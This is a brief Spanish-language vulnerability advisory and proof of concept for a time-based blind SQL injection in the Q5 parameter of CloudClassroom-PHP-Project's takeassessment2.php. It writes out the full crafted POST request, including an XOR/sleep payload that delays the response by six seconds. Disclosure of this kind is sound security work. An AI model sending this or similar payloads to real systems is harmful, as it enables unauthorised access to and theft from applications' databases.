
Prueba de concepto de una vulnerabilidad de inyección SQL ciega basada en tiempo en el endpoint takeassessment2.php de CloudClassroom-PHP-Project 1.0, que demuestra la explotación remota mediante una solicitud POST manipulada.
Existe una vulnerabilidad de inyección SQL en el endpoint takeassessment2.php de CloudClassroom-PHP-Project 1.0, donde el parámetro POST Q5 se inserta directamente en sentencias SQL sin desinfección.
Tipo de Vulnerabilidad :
Inyección SQL
Proveedor del Producto :
https://github.com/mathurvishal/CloudClassroom-PHP-Project
Código Base del Producto Afectado :
https://github.com/mathurvishal/CloudClassroom-PHP-Project 1.0 - https://github.com/mathurvishal/CloudClassroom-PHP-Project 1.0
Componente Afectado :
takeassessment2.php, parámetro POST Q5, lógica de consulta SQL
Vectores de Ataque :
Para explotar esta vulnerabilidad, un atacante envía una solicitud POST maliciosa a /CloudClassroom-PHP-Project-master/takeassessment2.php con un payload en el parámetro Q5 que provoca un retardo de tiempo en el procesamiento SQL (SQLi ciega basada en tiempo).
Solicitud POST:
POST /CloudClassroom-PHP-Project-master/takeassessment2.php?exid=4 HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded
Q1=555&Q2=555&Q3=555&Q4=555&Q5=5550'XOR(555*if(now()=sysdate(),sleep(6),0))XOR'Z&done= Esto provoca un retardo de 6 segundos en la respuesta, confirmando la vulnerabilidad.
Referencia :
https://owasp.org/www-community/attacks/SQL_Injection
Descubridor : saurabh solanki